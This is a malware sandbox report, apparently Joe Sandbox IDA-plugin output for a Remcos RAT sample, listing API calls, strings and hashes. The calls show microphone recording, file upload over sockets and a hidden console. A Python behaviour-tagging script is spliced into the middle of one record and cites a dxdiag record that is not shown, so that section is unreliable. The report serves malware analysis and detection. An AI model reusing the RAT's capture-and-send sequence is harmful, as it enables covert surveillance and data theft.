                                                                                                                  • Instruction ID: c19d1c6df4eaf99de932d1d3e2b79d277c3c3ae54bcdefde962c91a872100eda
                                                                                                                  • Opcode Fuzzy Hash: 89439ef8661f45509590dfd36efddff029347bf871da0d2e15e3f7cf58161c4e
                                                                                                                  • Instruction Fuzzy Hash: 5B313E719001085ADB14FBA1DC96EEE7764AF50708F00017FF906730E2EF786A8ACA9D
                                                                                                                  APIs
                                                                                                                  • _strftime.LIBCMT ref: 00401AD3
                                                                                                                    • Part of subcall function 00401BE8: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                                                                                  • waveInUnprepareHeader.WINMM(00471AC0,00000020,00000000,?), ref: 00401B85
                                                                                                                  • waveInPrepareHeader.WINMM(00471AC0,00000020), ref: 00401BC3
                                                                                                                  • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401BD2
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                                                                                  • String ID: %Y-%m-%d %H.%M$.wav$`=G$x=G
                                                                                                                  • API String ID: 3809562944-3643129801
                                                                                                                  • Opcode ID: c8c739ad250e8efed681293383896e24ae5503b811cc9679b8fabc89057276be
                                                                                                                  • Instruction ID: 71dc54c49c3278552d12686eedaa48b86947864de512bb92fe626abde6f710f1
                                                                                                                  • Opcode Fuzzy Hash: c8c739ad250e8efed681293383896e24ae5503b811cc9679b8fabc89057276be
                                                                                                                  • Instruction Fuzzy Hash: 98317E315053009BC314EF25DC56A9E77E8BB94314F40883EF559A21F1EF78AA49CB9A
                                                                                                                  APIs
                                                                                                                  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040197B
                                                                                                                  • waveInOpen.WINMM(00471AF8,000000FF,00471B00,Function_00001A8E,00000000,00000000,00000024), ref: 00401A11
                                                                                                                  • waveInPrepareHeader.WINMM(00471AC0,00000020,00000000), ref: 00401A66
                                                                                                                  • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401A75
                                                                                                                  • waveInStart.WINMM ref: 00401A81
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                                                                                  • String ID: XCG$`=G$x=G
                                                                                                                  • API String ID: 1356121797-903574159
                                                                                                                  • Opcode ID: 8206edf6e37a5adcca5346354a1971bb532ceb570a07efb292636a8a68d9c199
                                                                                                                  • Instruction ID: eaefd7a1fab34284b98bc4f49641b1dd71ce781583fbb4b877c049bb372049a4
                                                                                                                  • Opcode Fuzzy Hash: 8206edf6e37a5adcca5346354a1971bb532ceb570a07efb292636a8a68d9c199
                                                                                                                  • Instruction Fuzzy Hash: 1A215C316012409BC704DF7EFD1696A7BA9FB85742B00843AF50DE76B0EBB89880CB4C
                                                                                                                  APIs
                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041C998
                                                                                                                    • Part of subcall function 0041CA2F: RegisterClassExA.USER32(00000030), ref: 0041CA7C
                                                                                                                    • Part of subcall function 0041CA2F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA97
                                                                                                                    • Part of subcall function 0041CA2F: GetLastError.KERNEL32 ref: 0041CAA1
                                                                                                                  • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041C9CF
                                                                                                                  • lstrcpynA.KERNEL32(00473B68,Remcos,00000080), ref: 0041C9E9
                                                                                                                  • Shell_NotifyIconA.SHELL32(00000000,00473B50), ref: 0041C9FF
                                                                                                                  • TranslateMessage.USER32(?), ref: 0041CA0B
                                                                                                                  • DispatchMessageA.USER32(?), ref: 0041CA15
                                                                                                                  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041CA22
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                                                                  • String ID: Remcos
                                                                                                                  • API String ID: 1970332568-165870891
                                                                                                                  • Opcode ID: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                                                                                                  • Instruction ID: a3c1d7bf95fc3ae1ab8e5dc1b7104b29b221ef3087a45b83961503d05de66f2d
                                                                                                                  • Opcode Fuzzy Hash: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                                                                                                  • Instruction Fuzzy Hash: 620121B1944348ABD7109FA5FC4CEDA7BBCAB45B16F004035F605E2162D7B8A285DB2D
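An added example, not part of the Joe Sandbox report: a small Python parser that turns function records of the kind shown above (the ShellExecuteW/dxdiag record with the "/t", "\sysinfo.txt" and "temp" strings, the two waveIn* audio-capture records, and the Shell_NotifyIconA record carrying the "Remcos" tooltip) into behaviour tags an analyst can grep for across a whole report. The record text embedded in the script is abridged from this page; the tag names and the mapping from API sets to behaviours are the editor's interpretation of documented Windows API semantics (dxdiag /t writes its report to the named text file; waveInOpen followed by waveInStart begins microphone capture), not anything the sandbox itself emits.

```python
import re
from typing import Dict, List, Set, Tuple

# Constructed sample input: three function records abridged from the Joe Sandbox
# annotations on this page (only the "APIs" bullets and the "String ID" line of
# each record are kept; hashes and memory-dump lines are omitted).
SAMPLE_RECORDS = """
APIs
• ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 0041665C
  • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B643
• Sleep.KERNEL32(00000064), ref: 00416688
• DeleteFileW.KERNEL32(00000000), ref: 004166BC
• String ID: /t $\\sysinfo.txt$dxdiag$open$temp
APIs
• CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040197B
• waveInOpen.WINMM(00471AF8,000000FF,00471B00,Function_00001A8E,00000000,00000000,00000024), ref: 00401A11
• waveInPrepareHeader.WINMM(00471AC0,00000020,00000000), ref: 00401A66
• waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401A75
• waveInStart.WINMM ref: 00401A81
• String ID: XCG$`=G$x=G
APIs
• GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041C998
• ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041C9CF
• lstrcpynA.KERNEL32(00473B68,Remcos,00000080), ref: 0041C9E9
• Shell_NotifyIconA.SHELL32(00000000,00473B50), ref: 0041C9FF
• String ID: Remcos
"""

# One API bullet: "• Name.MODULE(args), ref: addr", or the indented
# "• Part of subcall function XXXX: Name.MODULE(...)" form.
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?([A-Za-z_]\w*)\.([A-Z0-9_]+)"
)

# Behaviour rules: tag -> (API names that must all be present, strings that must
# all be present). Tag names and the API-to-behaviour mapping are the editor's
# interpretation of documented Windows API semantics, not sandbox output.
RULES: Dict[str, Tuple[Set[str], Set[str]]] = {
    # dxdiag /t <file> writes a system report; the record launches it, sleeps,
    # then deletes the file it wrote under the temp directory as sysinfo.txt.
    "dxdiag_sysinfo_collection": (
        {"ShellExecuteW", "DeleteFileW"},
        {"dxdiag", "/t ", "\\sysinfo.txt"},
    ),
    # waveInOpen followed by waveInStart begins capturing from the microphone.
    "microphone_capture": ({"waveInOpen", "waveInStart"}, set()),
    # A notification-area icon whose tooltip buffer is filled with "Remcos".
    "tray_icon_named_remcos": ({"Shell_NotifyIconA"}, {"Remcos"}),
}


def parse_records(text: str) -> List[Dict[str, List[str]]]:
    """Split the annotation text into records, one per "APIs" heading, and
    collect the API names and the '$'-separated String ID values of each."""
    records: List[Dict[str, List[str]]] = []
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "APIs":
            current = {"apis": [], "strings": [], "tags": []}
            records.append(current)
            continue
        if current is None:
            continue
        if line.startswith("• String ID:"):
            payload = line[len("• String ID:"):].lstrip()
            current["strings"] = [s for s in payload.split("$") if s]
            continue
        m = API_RE.match(line)
        if m:
            current["apis"].append(m.group(1))
    return records


def tag_behaviours(record: Dict[str, List[str]]) -> List[str]:
    """Return every rule whose required APIs and strings all occur in the record."""
    apis = set(record["apis"])
    strings = set(record["strings"])
    return [
        tag
        for tag, (need_apis, need_strings) in RULES.items()
        if need_apis <= apis and need_strings <= strings
    ]


def analyze(text: str) -> List[Dict[str, List[str]]]:
    """Parse the records and attach behaviour tags to each."""
    records = parse_records(text)
    for record in records:
        record["tags"] = tag_behaviours(record)
    return records


if __name__ == "__main__":
    for i, record in enumerate(analyze(SAMPLE_RECORDS)):
        print(f"record {i}: apis={record['apis']} tags={record['tags']}")
```

Rules are deliberately conjunctive over both the API set and the string set so that a plain CRT function using DeleteFileW, or a legitimate audio library, is not tagged on one API alone; when pasting a full report, feed the whole text to analyze() and filter on non-empty tags.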
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 0747812b3ef30bf307ff75b73c960c026ca27f542f29018827700d11bc9c6ccf
                                                                                                                  • Instruction ID: eb32e44420a9d0dd2d5c4453ebfd120c933f738a1b2f21936dd04ad6d98d905f
                                                                                                                  • Opcode Fuzzy Hash: 0747812b3ef30bf307ff75b73c960c026ca27f542f29018827700d11bc9c6ccf
                                                                                                                  • Instruction Fuzzy Hash: 6FC1E670D042499FEF11DFADD8417AEBBB4EF4A304F08405AE814A7392C778D941CBA9
                                                                                                                  APIs
                                                                                                                  • GetCPInfo.KERNEL32(?,?), ref: 00452BE6
                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00452C69
                                                                                                                  • __alloca_probe_16.LIBCMT ref: 00452CA1
                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00452CFC
                                                                                                                  • __alloca_probe_16.LIBCMT ref: 00452D4B
                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00452D13
                                                                                                                    • Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00433637,?,?,00402BE9,?,00402629,00000000,?,00402578,?,?), ref: 00446B41
                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00452D8F
                                                                                                                  • __freea.LIBCMT ref: 00452DBA
                                                                                                                  • __freea.LIBCMT ref: 00452DC6
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 201697637-0
                                                                                                                  • Opcode ID: 5a84a6a5317ae172974df595155495cbc46435c9615446bda379f5f3d343e1a3
                                                                                                                  • Instruction ID: 924e7ddfc51c8ace49a4e982202af340d06b3b5a9b96f94d8290dca04e209d32
                                                                                                                  • Opcode Fuzzy Hash: 5a84a6a5317ae172974df595155495cbc46435c9615446bda379f5f3d343e1a3
                                                                                                                  • Instruction Fuzzy Hash: E691C572E002169BDF218E64CA41AEF7BB5AF0A311F14456BEC01E7243D7ADDC49C7A8
                                                                                                                  APIs
                                                                                                                  • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D1B
                                                                                                                  • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 10001D37
                                                                                                                  • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D4B
                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D58
                                                                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D72
                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D7D
                                                                                                                  • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D8A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4137058188.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4136980742.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 0000000C.00000002.4137058188.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1454806937-0
                                                                                                                  • Opcode ID: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                                                                                                  • Instruction ID: 3114db45d92e83daf92c47a85baf70c14dd0292bf94a6379629bf72341f68b19
                                                                                                                  • Opcode Fuzzy Hash: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                                                                                                  • Instruction Fuzzy Hash: 2221FCB594122CAFF710EBA08CCCFEF76ACEB08395F010566F515D2154D6709E458A70
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                                                                                    • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                                                                                    • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                                                                                    • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                                                                                  • _memcmp.LIBVCRUNTIME ref: 004446B3
                                                                                                                  • _free.LIBCMT ref: 00444724
                                                                                                                  • _free.LIBCMT ref: 0044473D
                                                                                                                  • _free.LIBCMT ref: 0044476F
                                                                                                                  • _free.LIBCMT ref: 00444778
                                                                                                                  • _free.LIBCMT ref: 00444784
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: _free$ErrorLast$_abort_memcmp
                                                                                                                  • String ID: C
                                                                                                                  • API String ID: 1679612858-1037565863
                                                                                                                  • Opcode ID: 5965148e21f94246bac9ccb3101c09a42f94ab2750877138e5eb6e840989efb8
                                                                                                                  • Instruction ID: 096df170494440478aae843429242aea5750b14c08813bebb9acd843c79e49b1
                                                                                                                  • Opcode Fuzzy Hash: 5965148e21f94246bac9ccb3101c09a42f94ab2750877138e5eb6e840989efb8
                                                                                                                  • Instruction Fuzzy Hash: E8B14A75A012199FEB24DF18C884BAEB7B4FF49314F1085AEE909A7351D739AE90CF44
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: tcp$udp
                                                                                                                  • API String ID: 0-3725065008
                                                                                                                  • Opcode ID: 3317bb7e427a09276a98136aacea04ff7717d48f4dd4b8ff28f9b5a2aba46388
                                                                                                                  • Instruction ID: e5bb8fef491b59a621f975c33c92e719a9e773eef76f1c958f584ffae729cd60
                                                                                                                  • Opcode Fuzzy Hash: 3317bb7e427a09276a98136aacea04ff7717d48f4dd4b8ff28f9b5a2aba46388
                                                                                                                  • Instruction Fuzzy Hash: 9171AB716083028FDB24CE5584847ABB6E4AF84746F10043FF885A7352E778DE85CB9A
                                                                                                                  APIs
                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,10006FFD,00000000,?,?,?,10008A72,?,?,00000100), ref: 1000887B
                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,10008A72,?,?,00000100,5EFC4D8B,?,?), ref: 10008901
                                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 100089FB
                                                                                                                  • __freea.LIBCMT ref: 10008A08
                                                                                                                    • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                                                  • __freea.LIBCMT ref: 10008A11
                                                                                                                  • __freea.LIBCMT ref: 10008A36
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4137058188.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4136980742.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 0000000C.00000002.4137058188.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                  • String ID: h(RA/
                                                                                                                  • API String ID: 1414292761-661517699
                                                                                                                  • Opcode ID: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                                                                                  • Instruction ID: 3f57ce737592ef9202bcebfaa3f65c0582e3f3231b4dd00ae19a895c9b397c34
                                                                                                                  • Opcode Fuzzy Hash: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                                                                                  • Instruction Fuzzy Hash: 4F51CF72710216ABFB15CF60CC85EAB37A9FB417D0F11462AFC44D6148EB35EE509BA1
                                                                                                                  APIs
                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 1000339B
                                                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 100033A3
                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 10003431
                                                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 1000345C
                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 100034B1
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4137058188.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4136980742.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                  • Associated: 0000000C.00000002.4137058188.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                  • String ID: csm$h(RA/
                                                                                                                  • API String ID: 1170836740-2974360138
                                                                                                                  • Opcode ID: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                                                                                  • Instruction ID: 0a936c430148d26a69835db3fa9f683d01d5328c1142e13f0191aacd949c771e
                                                                                                                  • Opcode Fuzzy Hash: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                                                                                  • Instruction Fuzzy Hash: D141D678E042189BEB12CF68C880A9FBBF9EF453A4F10C155E9159F25AD731FA01CB91
                                                                                                                  APIs
                                                                                                                  • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                                                                                                                  • WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                                                                                                    • Part of subcall function 00404468: send.WS2_32(000002B8,00000000,00000000,00000000), ref: 004044FD
                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                                                                                                  • MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                                                                                                  • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D08
                                                                                                                  • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D18
                                                                                                                    • Part of subcall function 0040455B: WaitForSingleObject.KERNEL32(?,000000FF,?,?,0040460E,00000000,?,?), ref: 0040456A
                                                                                                                    • Part of subcall function 0040455B: SetEvent.KERNEL32(?,?,?,0040460E,00000000,?,?), ref: 00404588
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                                                                                  • String ID: .part
                                                                                                                  • API String ID: 1303771098-3499674018
                                                                                                                  • Opcode ID: cf57b88e8736247bab96c122cc0a48a1b12f1b6bcdae9bb4a006722ccb69ac59
                                                                                                                  • Instruction ID: 92ff4720e6a7c249f3c3ae71a82c25b1888123647972eaae8327678ea1ca1cb3
                                                                                                                  • Opcode Fuzzy Hash: cf57b88e8736247bab96c122cc0a48a1b12f1b6bcdae9bb4a006722ccb69ac59
                                                                                                                  • Instruction Fuzzy Hash: 2131C4715083009FD210EF21DD459AFB7A8FB84315F40093FF9C6A21A1DB38AA48CB9A
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00412584: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 004125A6
                                                                                                                    • Part of subcall function 00412584: RegQueryValueExW.ADVAPI32(?,0040E0BA,00000000,00000000,?,00000400), ref: 004125C5
                                                                                                                    • Part of subcall function 00412584: RegCloseKey.ADVAPI32(?), ref: 004125CE
                                                                                                                    • Part of subcall function 0041B16B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B17C
                                                                                                                    • Part of subcall function 0041B16B: IsWow64Process.KERNEL32(00000000,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B183
                                                                                                                  • _wcslen.LIBCMT ref: 0041A906
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Process$CloseCurrentOpenQueryValueWow64_wcslen
                                                                                                                  • String ID: .exe$:@$XCG$http\shell\open\command$program files (x86)\$program files\
                                                                                                                  • API String ID: 3286818993-703403762
                                                                                                                  • Opcode ID: d1b129823d2eb871984bf039fa82585e8236e7331ec38122e0fed58a21493060
                                                                                                                  • Instruction ID: 668df6a2f2e8443cbe55da1b88d556a36153785c12b7582e9a7b6ce06fc50c8b
                                                                                                                  • Opcode Fuzzy Hash: d1b129823d2eb871984bf039fa82585e8236e7331ec38122e0fed58a21493060
                                                                                                                  • Instruction Fuzzy Hash: 4C217472B001046BDB04BAB58C96DEE366D9B85358F14093FF412B72D3EE3C9D9942A9
                                                                                                                  APIs
                                                                                                                  • AllocConsole.KERNEL32(00474358), ref: 0041BEC9
                                                                                                                  • GetConsoleWindow.KERNEL32 ref: 0041BECF
                                                                                                                  • ShowWindow.USER32(00000000,00000000), ref: 0041BEE2
                                                                                                                  • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041BF07
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Console$Window$AllocOutputShow
                                                                                                                  • String ID: Remcos v$5.3.0 Pro$CONOUT$
                                                                                                                  • API String ID: 4067487056-2527699604
                                                                                                                  • Opcode ID: 0969bb2dc50103f751eab8b76b07649baec71243ec5d0269df0f19859633e99b
                                                                                                                  • Instruction ID: 29466b5f89b818b32aee09a22b3208d506810ef61d6e100b210d0f7536d9046d
                                                                                                                  • Opcode Fuzzy Hash: 0969bb2dc50103f751eab8b76b07649baec71243ec5d0269df0f19859633e99b
                                                                                                                  • Instruction Fuzzy Hash: 3F0121B1980304BAD600FBF29D4BFDD37AC9B14705F5004277648EB193E6BCA554466D
                                                                                                                  APIs
                                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042CE63,?,?,?,00449BB1,00000001,00000001,?), ref: 004499BA
                                                                                                                  • __alloca_probe_16.LIBCMT ref: 004499F2
                                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042CE63,?,?,?,00449BB1,00000001,00000001,?), ref: 00449A40
